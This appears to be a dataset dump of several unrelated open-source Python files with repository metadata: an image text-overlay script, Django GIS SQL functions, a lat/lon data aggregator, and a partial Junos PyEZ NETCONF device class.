while y_text < img_height:
draw.text((0, y_text), textTmp[1:nRowChars], font = font)
textTmp = textTmp[nRowChars + 1:]
if (len(textTmp) <= nRowChars):
textTmp += text # repeat the characters if necessary
y_text += font_h
mask = ImageEnhance.Brightness(front).enhance(0)
out.paste(img, (0,0), mask)
return out
##
## @brief Main Function
##
## @param argv The argv
##
## @return
##
def main(argv):
parser = argparse.ArgumentParser(description = "imageCoder 0.1 (February 2017) by Author: David Zimmermann")
parser.add_argument("-i", "--imageFile", help = "input file for the background image", required = True)
parser.add_argument("-o", "--imageOut", help = "filename for the output image", required = True)
parser.add_argument("-t", "--textFile", help = "input file for the text/code", required = True)
parser.add_argument("-f", "--font", help = "fontname or font path to a truetype-font", required = False, default = "default")
parser.add_argument("-s", "--fontSize", help = "font size in pt", required = False, default = 10, type=int)
parser.add_argument("-w", "--width", help = "width of the output image", required = False, default = 1024, type=int)
parser.add_argument("-H", "--height", help = "height of the output image", required = False, default = 768, type=int)
args = parser.parse_args()
inFile = args.imageFile
outFile = args.imageOut
textFile = args.textFile
font = args.font
fontSize = args.fontSize
img_width = args.width
img_height = args.height
if (not inFile[-4:] == ".png"):
print("inFile has to be a .png-file")
sys.exit(2)
if (not os.path.isfile(inFile)):
print("Could not find file '%s'." % inFile)
sys.exit(2)
if (not os.path.isfile(textFile)):
print("Could not find file '%s'." % textFile)
sys.exit(2)
# load the text
text_file = open(textFile)
text = text_file.read()
text_file.close()
# clean the text
text = re.sub("\s+", " ", text)
text = re.sub("\n+", " ", text)
# load the image
img = Image.open(inFile)
img = img.resize((img_width, img_height), Image.ANTIALIAS)
# overlay the text
out = textOverlayInverse(img, text, font = font, fontSize = fontSize)
# save the text
out.save(outFile)
print("File saved to %s" % outFile)
if __name__ == "__main__":
main(sys.argv[1:])
|
DavZim/imageCoder
|
imageCoder.py
|
Python
|
mit
| 3,283
|
from decimal import Decimal
from django.contrib.gis.db.models.fields import GeometryField
from django.contrib.gis.db.models.sql import AreaField
from django.contrib.gis.measure import (
Area as AreaMeasure, Distance as DistanceMeasure,
)
from django.core.exceptions import FieldError
from django.db.models import FloatField, IntegerField, TextField
from django.db.models.expressions import Func, Value
from django.utils import six
NUMERIC_TYPES = six.integer_types + (float, Decimal)
class GeoFunc(Func):
function = None
output_field_class = None
geom_param_pos = 0
def __init__(self, *expressions, **extra):
if 'output_field' not in extra and self.output_field_class:
extra['output_field'] = self.output_field_class()
super(GeoFunc, self).__init__(*expressions, **extra)
@property
def name(self):
return self.__class__.__name__
@property
def srid(self):
expr = self.source_expressions[self.geom_param_pos]
if hasattr(expr, 'srid'):
return expr.srid
try:
return expr.field.srid
except (AttributeError, FieldError):
return None
def as_sql(self, compiler, connection):
if self.function is None:
self.function = connection.ops.spatial_function_name(self.name)
return super(GeoFunc, self).as_sql(compiler, connection)
def resolve_expression(self, *args, **kwargs):
res = super(GeoFunc, self).resolve_expression(*args, **kwargs)
base_srid = res.srid
if not base_srid:
raise TypeError("Geometry functions can only operate on geometric content.")
for pos, expr in enumerate(res.source_expressions[1:], start=1):
if isinstance(expr, GeomValue) and expr.srid != base_srid:
# Automatic SRID conversion so objects are comparable
res.source_expressions[pos] = Transform(expr, base_srid).resolve_expression(*args, **kwargs)
return res
def _handle_param(self, value, param_name='', check_types=None):
if not hasattr(value, 'resolve_expression'):
if check_types and not isinstance(value, check_types):
raise TypeError(
"The %s parameter has the wrong type: should be %s." % (
param_name, str(check_types))
)
return value
class GeomValue(Value):
geography = False
@property
def srid(self):
return self.value.srid
def as_sql(self, compiler, connection):
if self.geography:
self.value = connection.ops.Adapter(self.value, geography=self.geography)
else:
self.value = connection.ops.Adapter(self.value)
return super(GeomValue, self).as_sql(compiler, connection)
def as_mysql(self, compiler, connection):
return 'GeomFromText(%s)', [connection.ops.Adapter(self.value)]
def as_sqlite(self, compiler, connection):
return 'GeomFromText(%%s, %s)' % self.srid, [connection.ops.Adapter(self.value)]
def as_oracle(self, compiler, connection):
return 'SDO_GEOMETRY(%%s, %s)' % self.srid, [connection.ops.Adapter(self.value)]
class GeoFuncWithGeoParam(GeoFunc):
def __init__(self, expression, geom, *expressions, **extra):
if not hasattr(geom, 'srid') or not geom.srid:
raise ValueError("Please provide a geometry attribute with a defined SRID.")
super(GeoFuncWithGeoParam, self).__init__(expression, GeomValue(geom), *expressions, **extra)
class SQLiteDecimalToFloatMixin(object):
"""
By default, Decimal values are converted to str by the SQLite backend, which
is not acceptable by the GIS functions expecting numeric values.
"""
def as_sqlite(self, compiler, connection):
for expr in self.get_source_expressions():
if hasattr(expr, 'value') and isinstance(expr.value, Decimal):
expr.value = float(expr.value)
return super(SQLiteDecimalToFloatMixin, self).as_sql(compiler, connection)
class OracleToleranceMixin(object):
tolerance = 0.05
def as_oracle(self, compiler, connection):
tol = self.extra.get('tolerance', self.tolerance)
self.template = "%%(function)s(%%(expressions)s, %s)" % tol
return super(OracleToleranceMixin, self).as_sql(compiler, connection)
class Area(OracleToleranceMixin, GeoFunc):
def as_sql(self, compiler, connection):
if connection.ops.geography:
# Geography fields support area calculation, returns square meters.
self.output_field = AreaField('sq_m')
elif not self.output_field.geodetic(connection):
# Getting the area units of the geographic field.
units = self.output_field.units_name(connection)
if units:
self.output_field = AreaField(
AreaMeasure.unit_attname(self.output_field.units_name(connection))
)
else:
self.output_field = FloatField()
else:
# TODO: Do we want to support raw number areas for geodetic fields?
raise NotImplementedError('Area on geodetic coordinate systems not supported.')
return super(Area, self).as_sql(compiler, connection)
def as_oracle(self, compiler, connection):
self.output_field = AreaField('sq_m') # Oracle returns area in units of meters.
return super(Area, self).as_oracle(compiler, connection)
class AsGeoJSON(GeoFunc):
output_field_class = TextField
def __init__(self, expression, bbox=False, crs=False, precision=8, **extra):
expressions = [expression]
if precision is not None:
expressions.append(self._handle_param(precision, 'precision', six.integer_types))
options = 0
if crs and bbox:
options = 3
elif bbox:
options = 1
elif crs:
options = 2
if options:
expressions.append(options)
super(AsGeoJSON, self).__init__(*expressions, **extra)
class AsGML(GeoFunc):
geom_param_pos = 1
output_field_class = TextField
def __init__(self, expression, version=2, precision=8, **extra):
expressions = [version, expression]
if precision is not None:
expressions.append(self._handle_param(precision, 'precision', six.integer_types))
super(AsGML, self).__init__(*expressions, **extra)
class AsKML(AsGML):
def as_sqlite(self, compiler, connection):
# No version parameter
self.source_expressions.pop(0)
return super(AsKML, self).as_sql(compiler, connection)
class AsSVG(GeoFunc):
output_field_class = TextField
def __init__(self, expression, relative=False, precision=8, **extra):
relative = relative if hasattr(relative, 'resolve_expression') else int(relative)
expressions = [
expression,
relative,
self._handle_param(precision, 'precision', six.integer_types),
]
super(AsSVG, self).__init__(*expressions, **extra)
class BoundingCircle(GeoFunc):
def __init__(self, expression, num_seg=48, **extra):
super(BoundingCircle, self).__init__(*[expression, num_seg], **extra)
class Centroid(OracleToleranceMixin, GeoFunc):
pass
class Difference(OracleToleranceMixin, GeoFuncWithGeoParam):
pass
class DistanceResultMixin(object):
def convert_value(self, value, expression, connection, context):
if value is None:
return None
geo_field = GeometryField(srid=self.srid) # Fake field to get SRID info
if geo_field.geodetic(connection):
dist_att = 'm'
else:
units = geo_field.units_name(connection)
if units:
dist_att = DistanceMeasure.unit_attname(units)
else:
dist_att = None
if dist_att:
return DistanceMeasure(**{dist_att: value})
return value
class Distance(DistanceResultMixin, OracleToleranceMixin, GeoFuncWithGeoParam):
output_field_class = FloatField
spheroid = None
def __init__(self, expr1, expr2, spheroid=None, **extra):
expressions = [expr1, expr2]
if spheroid is not None:
self.spheroid = spheroid
expressions += (self._handle_param(spheroid, 'spheroid', bool),)
super(Distance, self).__init__(*expressions, **extra)
def as_postgresql(self, compiler, connection):
geo_field = GeometryField(srid=self.srid) # Fake field to get SRID info
src_field = self.get_source_fields()[0]
geography = src_field.geography and self.srid == 4326
if geography:
# Set parameters as geography if base field is geography
for pos, expr in enumerate(
self.source_expressions[self.geom_param_pos + 1:], start=self.geom_param_pos + 1):
if isinstance(expr, GeomValue):
expr.geography = True
elif geo_field.geodetic(connection):
# Geometry fields with geodetic (lon/lat) coordinates need special distance functions
if self.spheroid:
self.function = 'ST_Distance_Spheroid' # More accurate, resource intensive
# Replace boolean param by the real spheroid of the base field
self.source_expressions[2] = Value(geo_field._spheroid)
else:
self.function = 'ST_Distance_Sphere'
return super(Distance, self).as_sql(compiler, connection)
def as_oracle(self, compiler, connection):
if self.spheroid:
self.source_expressions.pop(2)
return super(Distance, self).as_oracle(compiler, connection)
class Envelope(GeoFunc):
pass
class ForceRHR(GeoFunc):
pass
class GeoHash(GeoFunc):
output_field_class = TextField
def __init__(self, expression, precision=None, **extra):
expressions = [expression]
if precision is not None:
expressions.append(self._handle_param(precision, 'precision', six.integer_types))
super(GeoHash, self).__init__(*expressions, **extra)
class Intersection(OracleToleranceMixin, GeoFuncWithGeoParam):
pass
class Length(DistanceResultMixin, OracleToleranceMixin, GeoFunc):
output_field_class = FloatField
def __init__(self, expr1, spheroid=True, **extra):
self.spheroid = spheroid
super(Length, self).__init__(expr1, **extra)
def as_sql(self, compiler, connection):
geo_field = GeometryField(srid=self.srid) # Fake field to get SRID info
if geo_field.geodetic(connection) and not connection.features.supports_length_geodetic:
raise NotImplementedError("This backend doesn't support Length on geodetic fields")
return super(Length, self).as_sql(compiler, connection)
def as_postgresql(self, compiler, connection):
geo_field = GeometryField(srid=self.srid) # Fake field to get SRID info
src_field = self.get_source_fields()[0]
geography = src_field.geography and self.srid == 4326
if geography:
self.source_expressions.append(Value(self.spheroid))
elif geo_field.geodetic(connection):
# Geometry fields with geodetic (lon/lat) coordinates need length_spheroid
self.function = 'ST_Length_Spheroid'
self.source_expressions.append(Value(geo_field._spheroid))
else:
dim = min(f.dim for f in self.get_source_fields() if f)
if dim > 2:
self.function = connection.ops.length3d
return super(Length, self).as_sql(compiler, connection)
def as_sqlite(self, compiler, connection):
geo_field = GeometryField(srid=self.srid)
if geo_field.geodetic(connection):
if self.spheroid:
self.function = 'GeodesicLength'
else:
self.function = 'GreatCircleLength'
return super(Length, self).as_sql(compiler, connection)
class MemSize(GeoFunc):
output_field_class = IntegerField
class NumGeometries(GeoFunc):
output_field_class = IntegerField
class NumPoints(GeoFunc):
output_field_class = IntegerField
def as_sqlite(self, compiler, connection):
if self.source_expressions[self.geom_param_pos].output_field.geom_type != 'LINESTRING':
raise TypeError("Spatialite NumPoints can only operate on LineString content")
return super(NumPoints, self).as_sql(compiler, connection)
class Perimeter(DistanceResultMixin, OracleToleranceMixin, GeoFunc):
output_field_class = FloatField
def as_postgresql(self, compiler, connection):
dim = min(f.dim for f in self.get_source_fields())
if dim > 2:
self.function = connection.ops.perimeter3d
return super(Perimeter, self).as_sql(compiler, connection)
class PointOnSurface(OracleToleranceMixin, GeoFunc):
pass
class Reverse(GeoFunc):
pass
class Scale(SQLiteDecimalToFloatMixin, GeoFunc):
def __init__(self, expression, x, y, z=0.0, **extra):
expressions = [
expression,
self._handle_param(x, 'x', NUMERIC_TYPES),
self._handle_param(y, 'y', NUMERIC_TYPES),
]
if z != 0.0:
expressions.append(self._handle_param(z, 'z', NUMERIC_TYPES))
super(Scale, self).__init__(*expressions, **extra)
class SnapToGrid(SQLiteDecimalToFloatMixin, GeoFunc):
def __init__(self, expression, *args, **extra):
nargs = len(args)
expressions = [expression]
if nargs in (1, 2):
expressions.extend(
[self._handle_param(arg, '', NUMERIC_TYPES) for arg in args]
)
elif nargs == 4:
# Reverse origin and size param ordering
expressions.extend(
[self._handle_param(arg, '', NUMERIC_TYPES) for arg in args[2:]]
)
expressions.extend(
[self._handle_param(arg, '', NUMERIC_TYPES) for arg in args[0:2]]
)
else:
raise ValueError('Must provide 1, 2, or 4 arguments to `SnapToGrid`.')
super(SnapToGrid, self).__init__(*expressions, **extra)
class SymDifference(OracleToleranceMixin, GeoFuncWithGeoParam):
pass
class Transform(GeoFunc):
def __init__(self, expression, srid, **extra):
expressions = [
expression,
self._handle_param(srid, 'srid', six.integer_types),
]
super(Transform, self).__init__(*expressions, **extra)
@property
def srid(self):
# Make srid the resulting srid of the transformation
return self.source_expressions[self.geom_param_pos + 1].value
def convert_value(self, value, expression, connection, context):
value = super(Transform, self).convert_value(value, expression, connection, context)
if not connection.ops.postgis and not value.srid:
# Some backends do not set the srid on the returning geometry
value.srid = self.srid
return value
class Translate(Scale):
def as_sqlite(self, compiler, connection):
func_name = connection.ops.spatial_function_name(self.name)
if func_name == 'ST_Translate' and len(self.source_expressions) < 4:
# Always provide the z parameter for ST_Translate (Spatialite >= 3.1)
self.source_expressions.append(Value(0))
elif func_name == 'ShiftCoords' and len(self.source_expressions) > 3:
raise ValueError("This version of Spatialite doesn't support 3D")
return super(Translate, self).as_sqlite(compiler, connection)
class Union(OracleToleranceMixin, GeoFuncWithGeoParam):
pass
|
whitehorse-io/encarnia
|
pyenv/lib/python2.7/site-packages/django/contrib/gis/db/models/functions.py
|
Python
|
mit
| 15,760
|
import numpy as np
from scipy.io import netcdf_file
import bz2
import os
from fnmatch import fnmatch
from numba import jit
@jit
def binsum2D(data, i, j, Nx, Ny):
data_binned = np.zeros((Ny,Nx), dtype=data.dtype)
N = len(data)
for n in range(N):
data_binned[j[n],i[n]] += data[n]
return data_binned
class LatLonAggregator(object):
"""A class for aggregating L2 data into a gridded dataset."""
def __init__(self, dlon=1., dlat=1., lonlim=(-180,180), latlim=(-90,90)):
self.dlon = dlon
self.dlat = dlat
self.lonmin = lonlim[0]
self.lonmax = lonlim[1]
self.latmin = latlim[0]
self.latmax = latlim[1]
# define grids
self.lon = np.arange(self.lonmin, self.lonmax, dlon)
self.lat = np.arange(self.latmin, self.latmax, dlat)
self.Nx, self.Ny = len(self.lon), len(self.lat)
self.lonc = self.lon + self.dlon/2
self.latc = self.lat + self.dlat/2
def binsum(self, data, lon, lat):
"""Bin the data into the lat-lon grid.
Returns gridded dataset."""
i = np.digitize(lon.ravel(), self.lon)
j = np.digitize(lat.ravel(), self.lat)
return binsum2D(data.ravel(), i, j, self.Nx, self.Ny)
def zeros(self, dtype=np.dtype('f4')):
return np.zeros((self.Ny, self.Nx), dtype=dtype)
|
rabernat/satdatatools
|
satdatatools/aggregator.py
|
Python
|
mit
| 1,349
|
# stdlib
import os
import types
import platform
import warnings
import traceback
# stdlib, in support of the the 'probe' method
import socket
import datetime
import time
import json
# 3rd-party packages
from lxml import etree
from ncclient import manager as netconf_ssh
import ncclient.transport.errors as NcErrors
import ncclient.operations.errors as NcOpErrors
from ncclient.operations import RPCError
import paramiko
import jinja2
# local modules
from jnpr.junos.rpcmeta import _RpcMetaExec
from jnpr.junos import exception as EzErrors
from jnpr.junos.cfg import Resource
from jnpr.junos.facts import *
from jnpr.junos import jxml as JXML
from jnpr.junos.decorators import timeoutDecorator, normalizeDecorator
_MODULEPATH = os.path.dirname(__file__)
class _MyTemplateLoader(jinja2.BaseLoader):
"""
Create a jinja2 template loader class that can be used to
load templates from all over the filesystem, but defaults
to the CWD and the 'templates' directory of the module
"""
def __init__(self):
self.paths = ['.', os.path.join(_MODULEPATH, 'templates')]
def get_source(self, environment, template):
def _in_path(dir):
return os.path.exists(os.path.join(dir, template))
path = filter(_in_path, self.paths)
if not path:
raise jinja2.TemplateNotFound(template)
path = os.path.join(path[0], template)
mtime = os.path.getmtime(path)
with file(path) as f:
source = f.read().decode('utf-8')
return source, path, lambda: mtime == os.path.getmtime(path)
_Jinja2ldr = jinja2.Environment(loader=_MyTemplateLoader())
class Device(object):
"""
Junos Device class.
:attr:`ON_JUNOS`:
**READ-ONLY** -
Auto-set to ``True`` when this code is running on a Junos device,
vs. running on a local-server remotely connecting to a device.
:attr:`auto_probe`:
When non-zero the call to :meth:`open` will probe for NETCONF
reachability before proceeding with the NETCONF session establishment.
If you want to enable this behavior by default, you could do the
following in your code::
from jnpr.junos import Device
# set all device open to auto-probe with timeout of 10 sec
Device.auto_probe = 10
dev = Device( ... )
dev.open() # this will probe before attempting NETCONF connect
"""
ON_JUNOS = platform.system().upper() == 'JUNOS'
auto_probe = 0 # default is no auto-probe
# -------------------------------------------------------------------------
# PROPERTIES
# -------------------------------------------------------------------------
# ------------------------------------------------------------------------
# property: hostname
# ------------------------------------------------------------------------
@property
def hostname(self):
"""
:returns: the host-name of the Junos device.
"""
return self._hostname if (
self._hostname != 'localhost') else self.facts.get('hostname')
# ------------------------------------------------------------------------
# property: user
# ------------------------------------------------------------------------
@property
def user(self):
"""
:returns: the login user (str) accessing the Junos device
"""
return self._auth_user
# ------------------------------------------------------------------------
# property: password
# ------------------------------------------------------------------------
@property
def password(self):
"""
:returns: ``None`` - do not provide the password
"""
return None # read-only
@password.setter
def password(self, value):
"""
Change the authentication password value. This is handy in case
the calling program needs to attempt different passwords.
"""
self._auth_password = value
# ------------------------------------------------------------------------
# property: logfile
# ------------------------------------------------------------------------
@property
def logfile(self):
"""
:returns: exsiting logfile ``file`` object.
"""
return self._logfile
@logfile.setter
def logfile(self, value):
"""
Assigns an opened file object to the device for logging
If there is an open logfile, and 'value' is ``None`` or ``False``
then close the existing file.
:param file value: An open ``file`` object.
:returns: the new logfile ``file`` object
:raises ValueError:
When **value** is not a ``file`` object
"""
# got an existing file that we need to close
if (not value) and (None != self._logfile):
rc = self._logfile.close()
self._logfile = False
return rc
if not isinstance(value, file):
raise ValueError("value must be a file object")
self._logfile = value
return self._logfile
# ------------------------------------------------------------------------
# property: timeout
# ------------------------------------------------------------------------
@property
def timeout(self):
"""
:returns: the current RPC timeout value (int) in seconds.
"""
return self._conn.timeout
@timeout.setter
def timeout(self, value):
"""
Used to change the RPC timeout value (default=30 sec).
:param int value:
New timeout value in seconds
"""
self._conn.timeout = value
# ------------------------------------------------------------------------
# property: facts
# ------------------------------------------------------------------------
@property
def facts(self):
"""
:returns: Device fact dictionary
"""
return self._facts
@facts.setter
def facts(self, value):
""" read-only property """
raise RuntimeError("facts is read-only!")
# ------------------------------------------------------------------------
# property: manages
# ------------------------------------------------------------------------
@property
def manages(self):
"""
:returns:
``list`` of Resource Managers/Utilities attached to this
instance using the :meth:`bind` method.
"""
return self._manages
# ------------------------------------------------------------------------
# property: transform
# ------------------------------------------------------------------------
@property
def transform(self):
"""
:returns: the current RPC XML Transformation.
"""
return self._conn._device_handler.transform_reply
@transform.setter
def transform(self, func):
"""
Used to change the RPC XML Transformation.
:param lambda value:
New transform lambda
"""
self._conn._device_handler.transform_reply = func
# -----------------------------------------------------------------------
# OVERLOADS
# -----------------------------------------------------------------------
def __repr__(self):
return "Device(%s)" % self.hostname
# -----------------------------------------------------------------------
# CONSTRUCTOR
# -----------------------------------------------------------------------
def _sshconf_lkup(self):
if self._ssh_config:
sshconf_path = os.path.expanduser(self._ssh_config)
else:
home = os.getenv('HOME')
if not home:
return None
sshconf_path = os.path.join(os.getenv('HOME'), '.ssh/config')
if not os.path.exists(sshconf_path):
return None
else:
sshconf = paramiko.SSHConfig()
sshconf.parse(open(sshconf_path, 'r'))
found = sshconf.lookup(self._hostname)
self._hostname = found.get('hostname', self._hostname)
self._port = found.get('port', self._port)
self._conf_auth_user = found.get('user')
self._conf_ssh_private_key_file = found.get('identityfile')
return sshconf_path
def __init__(self, *vargs, **kvargs):
"""
Device object constructor.
:param str vargs[0]: host-name or ipaddress. This is an
alternative for **host**
:param str host:
**REQUIRED** host-name or ipaddress of target device
:param str user:
*OPTIONAL* login user-name, uses $USER if not provided
:param str passwd:
*OPTIONAL* if not provided, assumed ssh-keys are enforced
:param int port:
*OPTIONAL* NETCONF port (defaults to 830)
:param bool gather_facts:
*OPTIONAL* default is ``True``. If ``False`` then the
facts are not gathered on call to :meth:`open`
:param bool auto_probe:
*OPTIONAL* if non-zero then this enables auto_probe at time of
:meth:`open` and defines the amount of time(sec) for the
probe timeout
:param str ssh_private_key_file:
*OPTIONAL* The path to the SSH private key file.
This can be used if you need to provide a private key rather than
loading the key into the ssh-key-ring/environment. if your
ssh-key requires a password, then you must provide it via
**passwd**
:param str ssh_config:
*OPTIONAL* The path to the SSH configuration file.
This can be used to load SSH information from a configuration file.
By default ~/.ssh/config is queried.
:param bool normalize:
*OPTIONAL* default is ``False``. If ``True`` then the
XML returned by :meth:`execute` will have whitespace normalized
"""
# ----------------------------------------
# setup instance connection/open variables
# ----------------------------------------
hostname = vargs[0] if len(vargs) else kvargs.get('host')
self._port = kvargs.get('port', 830)
self._gather_facts = kvargs.get('gather_facts', True)
self._normalize = kvargs.get('normalize', False)
self._auto_probe = kvargs.get('auto_probe', self.__class__.auto_probe)
if self.__class__.ON_JUNOS is True and hostname is None:
# ---------------------------------
# running on a Junos device locally
# ---------------------------------
self._auth_user = None
self._auth_password = None
self._hostname = 'localhost'
self._ssh_private_key_file = None
self._ssh_config = None
else:
# --------------------------
# making a remote connection
# --------------------------
if hostname is None:
raise ValueError("You must provide the 'host' value")
self._hostname = hostname
# user will default to $USER
self._auth_user = os.getenv('USER')
self._conf_auth_user = None
self._conf_ssh_private_key_file = None
# user can get updated by ssh_config
self._ssh_config = kvargs.get('ssh_config')
self._sshconf_path = self._sshconf_lkup()
# but if user or private key is explit from call, then use it.
self._auth_user = kvargs.get('user') or self._conf_auth_user or self._auth_user
self._ssh_private_key_file = kvargs.get('ssh_private_key_file') or self._conf_ssh_private_key_file
self._auth_password = kvargs.get('password') or kvargs.get('passwd')
# -----------------------------
# initialize instance variables
# ------------------------------
self._conn = None
self._j2ldr = _Jinja2ldr
self._manages = []
self._facts = {}
# public attributes
self.connected = False
self.rpc = _RpcMetaExec(self)
# -----------------------------------------------------------------------
# Basic device methods
# -----------------------------------------------------------------------
def open(self, *vargs, **kvargs):
"""
Opens a connection to the device using existing login/auth
information.
:param bool gather_facts:
If set to ``True``/``False`` will override the device
instance value for only this open process
:param bool auto_probe:
If non-zero then this enables auto_probe and defines the amount
of time/seconds for the probe timeout
:param bool normalize:
If set to ``True``/``False`` will override the device
instance value for only this open process
:returns Device: Device instance (*self*).
:raises ProbeError:
When **auto_probe** is ``True`` and the probe activity
exceeds the timeout
:raises ConnectAuthError:
When provided authentication credentials fail to login
:raises ConnectRefusedError:
When the device does not have NETCONF enabled
:raises ConnectTimeoutError:
When the the :meth:`Device.timeout` value is exceeded
during the attempt to connect to the remote device
:raises ConnectError:
When an error, other than the above, occurs. The
originating ``Exception`` is assigned as ``err._orig``
and re-raised to the caller.
"""
auto_probe = kvargs.get('auto_probe', self._auto_probe)
if auto_probe is not 0:
if not self.probe(auto_probe):
raise EzErrors.ProbeError(self)
try:
ts_start = datetime.datetime.now()
# we want to enable the ssh-agent if-and-only-if we are
# not given a password or an ssh key file.
# in this condition it means we want to query the agent
# for available ssh keys
allow_agent = bool((self._auth_password is None) and
(self._ssh_private_key_file is None))
# open connection using ncclient transport
self._conn = netconf_ssh.connect(
host=self._hostname,
port=self._port,
username=self._auth_user,
password=self._auth_password,
hostkey_verify=False,
key_filename=self._ssh_private_key_file,
allow_agent=allow_agent,
ssh_config=self._sshconf_lkup(),
device_params={'name': 'junos'})
except NcErrors.AuthenticationError as err:
# bad authentication credentials
raise EzErrors.ConnectAuthError(self)
except NcErrors.SSHError as err:
# this is a bit of a hack for now, since we want to
# know if the connection was refused or we simply could
# not open a connection due to reachability. so using
# a timestamp to differentiate the two conditions for now
# if the diff is < 3 sec, then assume the host is
# reachable, but NETCONF connection is refushed.
ts_err = datetime.datetime.now()
diff_ts = ts_err - ts_start
if diff_ts.seconds < 3:
raise EzErrors.ConnectRefusedError(self)
# at this point, we assume that the connection
# has timeed out due to ip-reachability issues
if str(err).find('not open') > 0:
raise EzErrors.ConnectTimeoutError(self)
else:
# otherwise raise a generic connection
# error for now. tag the new exception
# with the original for debug
cnx = EzErrors.ConnectError(self)
cnx._orig = err
raise cnx
except socket.gaierror:
# invalid DNS name, so unreachable
raise EzErrors.ConnectUnknownHostError(self)
except Exception as err:
# anything else, we will re-raise as a
# generic ConnectError
cnx_err = EzErrors.ConnectError(self)
cnx_err._orig = err
raise cnx_err
self.connected = True
self._nc_transform = self.transform
self._norm_transform = lambda: JXML.normalize_xslt
normalize = kvargs.get('normalize', self._normalize)
if normalize is True:
self.transform = self._norm_transform
gather_facts = kvargs.get('gather_facts', self._gather_facts)
if gather_facts is True:
self.facts_refresh()
return self
def close(self):
"""
Closes the connection to the device.
"""
self._conn.close_session()
self.connected = False
@normalizeDecorator
@timeoutDecorator
def execute(self, rpc_cmd, **kvargs):
"""
Executes an XML RPC and returns results as either XML or native python
:param rpc_cmd:
can either be an XML Element or xml-as-string. In either case
the command starts with the specific command element, i.e., not the
<rpc> element itself
:param func to_py':
Is a caller provided function that takes the response and
will convert the results to native python types. all kvargs
will be passed to this function as well in the form::
to_py( self, rpc_rsp, **kvargs )
:raises ValueError:
When the **rpc_cmd** is of unknown origin
:raises PermissionError:
When the requested RPC command is not allowed due to
user-auth class privilege controls on Junos
:raises RpcError:
When an ``rpc-error`` element is contained in the RPC-reply
:returns:
RPC-reply as XML object. If **to_py** is provided, then
that function is called, and return of that function is
provided back to the caller; presumably to convert the XML to
native python data-types (e.g. ``dict``).
"""
if self.connected is not True:
raise EzErrors.ConnectClosedError(self)
if isinstance(rpc_cmd, str):
rpc_cmd_e = etree.XML(rpc_cmd)
elif isinstance(rpc_cmd, etree._Element):
rpc_cmd_e = rpc_cmd
else:
raise ValueError(
"Dont know what to do with rpc of type %s" %
rpc_cmd.__class__.__name__)
# invoking a bad RPC will cause a connection object exception
# will will be raised directly to the caller ... for now ...
# @@@ need to trap this and re-raise accordingly.
try:
rpc_rsp_e = self._conn.rpc(rpc_cmd_e)._NCElement__doc
except NcOpErrors.TimeoutExpiredError:
# err is a TimeoutExpiredError from ncclient,
# which has no such attribute as xml.
raise EzErrors.RpcTimeoutError(self, rpc_cmd_e.tag, self.timeout)
except NcErrors.TransportError:
raise EzErrors.ConnectClosedError(self)
except RPCError as err:
rsp = JXML.remove_namespaces(err.xml)
# see if this is a permission error
e = EzErrors.PermissionError if rsp.findtext('error-message') == 'permission denied' else EzErrors.RpcError
raise e(cmd=rpc_cmd_e, rsp=rsp, errs=err)
# Something unexpected happened - raise it up
except Exception as err:
warnings.warn("An unknown exception occured - please report.", RuntimeWarning)
raise
# From 14.2 onward, junos supports JSON, so now code can be written as
# dev.rpc.get_route_engine_information({'format': 'json'})
if rpc_cmd_e.attrib.get('format') in ['json', 'JSON']:
if self._facts == {}:
self.facts_refresh()
ver_info = self._facts['version_info']
if ver_info.major[0] >= 15 or \
(ver_info.major[0] == 14 and ver_info.major[1] >= 2):
return json.loads(rpc_rsp_e.text)
else:
warnings.warn("Native JSON support is only from 14.2 onwards",
RuntimeWarning)
# This section is here for the possible use of something other than ncclient
# for RPCs that have embedded rpc-errors, need to check for those now
# rpc_errs = rpc_rsp_e.xpath('.//rpc-error')
# if len(rpc_errs):
# raise EzErrors.RpcError(cmd=rpc_cmd_e, rsp=rpc_errs[0])
# skip the <rpc-reply> element and pass the caller first child element
# generally speaking this is what they really want. If they want to
# uplevel they can always call the getparent() method on it.
try:
ret_rpc_rsp = rpc_rsp_e[0]
except IndexError:
# no children, so assume it means we are OK
return True
# if the caller provided a "to Python" conversion function, then invoke
# that now and return the results of that function. otherwise just
# return the RPC results as XML
if kvargs.get('to_py'):
return kvargs['to_py'](self, ret_rpc_rsp, **kvargs)
else:
return ret_rpc_rsp
# ------------------------------------------------------------------------
# cli - for cheating commands :-)
# ------------------------------------------------------------------------
def cli(self, command, format='text', warning=True):
"""
Executes the CLI command and returns the CLI text output by default.
:param str command:
The CLI command to execute, e.g. "show version"
:param str format:
The return format, by default is text. You can optionally select
"xml" to return the XML structure.
.. note::
You can also use this method to obtain the XML RPC command for a
given CLI command by using the pipe filter ``| display xml rpc``. When
you do this, the return value is the XML RPC command. For example if
you provide as the command ``show version | display xml rpc``, you will
get back the XML Element ``<get-software-information>``.
.. warning::
This function is provided for **DEBUG** purposes only!
**DO NOT** use this method for general automation purposes as
that puts you in the realm of "screen-scraping the CLI". The purpose of
the PyEZ framework is to migrate away from that tooling pattern.
Interaction with the device should be done via the RPC function.
.. warning::
You cannot use "pipe" filters with **command** such as ``| match``
or ``| count``, etc. The only value use of the "pipe" is for the
``| display xml rpc`` as noted above.
"""
if 'display xml rpc' not in command and warning is True:
warnings.simplefilter("always")
warnings.warn("CLI command is for debug use only!", RuntimeWarning)
warnings.resetwarnings()
try:
rsp = self.rpc.cli(command, format)
if rsp.tag == 'output':
return rsp.text
if rsp.tag == 'configuration-information':
return rsp.findtext('configuration-output')
if rsp.tag == 'rpc':
return rsp[0]
return rsp
except:
return "invalid command: " + command
def display_xml_rpc(self, command, format='xml'):
"""
Executes the CLI command and returns the CLI text output by default.
:param str command:
The CLI command to retrieve XML RPC for, e.g. "show version"
:param str format:
The return format, by default is XML. You can optionally select
"text" to return the XML structure as a string.
"""
try:
command = command + '| display xml rpc'
rsp = self.rpc.cli(command)
if format == 'text':
return etree.tostring(rsp[0])
return rsp[0]
except:
return "invalid command: " + command
# ------------------------------------------------------------------------
# Template: retrieves a Jinja2 template
# ------------------------------------------------------------------------
def Template(self, filename, parent=None, gvars=None):
"""
Used to return a Jinja2 :class:`Template`.
:param str filename:
file-path to Jinja2 template file on local device
:returns: Jinja2 :class:`Template` give **filename**.
"""
return self._j2ldr.get_template(filename, parent, gvars)
# ------------------------------------------------------------------------
# dealing with bind aspects
# ------------------------------------------------------------------------
def bind(self, *vargs, **kvargs):
"""
Used to attach things to this Device instance and make them a
property of the :class:Device instance. The most common use
for bind is attaching Utility instances to a :class:Device.
For example::
from jnpr.junos.utils.config import Config
dev.bind( cu=Config )
dev.cu.lock()
# ... load some changes
dev.cu.commit()
dev.cu.unlock()
:param list vargs:
A list of functions that will get bound as instance methods to
